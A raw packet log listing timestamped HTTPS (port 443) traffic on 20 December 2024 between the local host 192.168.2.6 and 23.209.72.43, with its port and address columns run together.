                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.120975971 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.120990992 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.123367071 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.123379946 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.127367020 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.131361961 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.131591082 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.131608009 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.131624937 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.132275105 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.132287979 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.132299900 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.134253979 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.134718895 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.136046886 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.145090103 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.145103931 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.149441004 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.149455070 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.149466991 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.149701118 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.151226044 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.151240110 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.151364088 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.151591063 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.151669025 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.200722933 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.215179920 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.273266077 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.453550100 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.461545944 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.461884975 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462007046 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462130070 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462308884 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462321043 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462363005 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462373972 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462384939 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462491035 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462503910 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462529898 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462814093 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.474047899 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.474095106 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.474107981 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.474212885 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.491337061 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.491503954 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.587301016 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.627305984 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.632632971 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.632651091 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.632663965 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.632674932 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.632684946 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.632983923 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.633061886 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.633119106 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.649617910 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.801568031 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.805798054 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.812980890 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813205957 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813255072 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813258886 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813306093 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813318014 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813430071 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813442945 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813523054 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813535929 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813548088 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813666105 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813684940 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813781023 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813792944 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813815117 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813894987 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813905954 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813918114 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813929081 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.813941002 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.827152014 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.827163935 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.827205896 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.827326059 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.827343941 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.827356100 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.827493906 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.827503920 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.827510118 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.827522039 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.827536106 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.834811926 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.834841013 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.834852934 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.834984064 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.834990025 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.835022926 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.835033894 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.835150957 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.835170031 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.835182905 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.835289955 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.845552921 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.845659018 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.845870972 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.845889091 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.845902920 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.845995903 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.846019983 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.846031904 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.846043110 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.846055031 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.846194983 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.857753038 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.857788086 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.857800961 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.857913971 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.857924938 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.857937098 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.857949972 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.858037949 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.858104944 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.858119965 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.858131886 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.868900061 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.868922949 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.868936062 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.868969917 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.868980885 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.869075060 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.869086027 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.869097948 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.869101048 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.869277000 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.869290113 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.879348040 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.879555941 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.879609108 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.879621029 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.879719019 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.879729986 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.879806042 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.879817009 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.879827976 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.879929066 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.879940033 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.892491102 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.892555952 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.892607927 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.892618895 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.892735958 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.892755032 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.892766953 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.892780066 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.892927885 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.892940044 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.892963886 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.901416063 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.901483059 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.901494980 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.901602983 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.901614904 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.901634932 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.901638985 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.901683092 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.901704073 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.901726007 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.901737928 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.917107105 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.917191982 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.917325974 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.917337894 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.917367935 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.917399883 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.917412043 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.917462111 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.917516947 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.917534113 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.917546034 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.923885107 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.923921108 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.923933029 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.924053907 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.924066067 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.924078941 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.924093008 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.924258947 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.924271107 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.924283981 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.924360991 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.934472084 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.934484005 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.934495926 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.934664965 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.934690952 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.934701920 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.934801102 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.934812069 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.934823036 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.934830904 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.934835911 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.945710897 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.945723057 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.945739985 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.945851088 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.945862055 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.945873022 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.945884943 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.945983887 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.946022034 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.946034908 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.946082115 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.957469940 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.957496881 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.957508087 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.957617044 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.957628965 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.957640886 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.957751989 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.957766056 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.957767963 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.967883110 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.977947950 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.978101969 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.978112936 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.978220940 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.978315115 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.984515905 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.159140110 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.163768053 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.327497959 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.497200012 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.518300056 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.518318892 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.518452883 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.518699884 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.518712997 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.518773079 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.518784046 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.518796921 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.518912077 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.522119045 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.522133112 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.536967993 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.851406097 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.858611107 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.858885050 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.858951092 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.858988047 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.859162092 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.859500885 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.859556913 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.859590054 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.859625101 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.859728098 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:55.859761000 CET4436501423.209.72.43192.168.2.6
